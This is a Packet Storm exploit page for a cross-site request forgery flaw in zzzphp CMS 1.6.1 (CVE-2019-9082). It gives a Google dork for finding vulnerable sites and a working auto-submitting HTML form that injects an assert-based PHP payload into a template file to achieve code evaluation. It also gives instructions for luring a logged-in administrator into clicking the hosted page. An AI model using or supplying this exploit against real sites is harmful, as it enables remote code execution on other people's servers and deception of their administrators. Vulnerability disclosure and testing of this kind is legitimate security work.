exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

zzzphp CMS 1.6.1 Cross Site Request Forgery

zzzphp CMS 1.6.1 Cross Site Request Forgery
Posted Mar 4, 2019
Authored by Yang Chenglong

zzzphp CMS version 1.6.1 suffers from a cross site request forgery vulnerability.

tags | exploit, csrf
advisories | CVE-2019-9082
SHA-256 | 3305948ea10cafcf561b9aa0131e5da0eae0c8bcbf0b6ebc91a1f629473723df

zzzphp CMS 1.6.1 Cross Site Request Forgery

Change Mirror Download
# Exploit Title: Cross-Site Request Forgery(CSRF) of zzzphp cms 1.6.1
# Google Dork: intext:"2015-2019 zzcms.com"

# Date: 26/02/2019

# Exploit Author: Yang Chenglong

# Vendor Homepage: https://www.zzzcms.com/index.html

# Software Link: https://115.29.55.18/zzzphp.zip

# Version: 1.6.1

# Tested on: windows/Linux,iis/apache

# CVE : CVE-2019-9082

Due to the absence of CSRF token in the request, attackers can forge the post request and insert malicious codes into the template file which leads to dynamic code evaluation.

Exploit:


<html>



<!-- CSRF PoC - generated by Burp Suite Professional -->



<body>



<script>history.pushState('', '', '/')</script>



<form action="https://192.168.1.64/zzzphp/admin015/save.php?act=editfile" method="POST">



<input type="hidden" name="file" value="/zzzphp/template/pc/cn2016/html/search.html" />



<input type="hidden" name="filetext" value="{if:assert($_POST[x])}phpinfo();{end if}" />



<input type="submit" value="Submit request" />



</form>



<script>



document.forms[0].submit();



</script>



</body>



</html>

Save the codes above as html file and host it on a web server. Send the link to the administrator of the website and ask him to click the link(request for exchange friend link or any other possible method), if the person has logged on to the admin panel, it will automatically insert malicious codes in to the template file and leads to dynamic code evaluation.

Remarks: This is a follow up exploit of CVE-2019-9041, whose exploit is here: https://www.exploit-db.com/exploits/46454
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close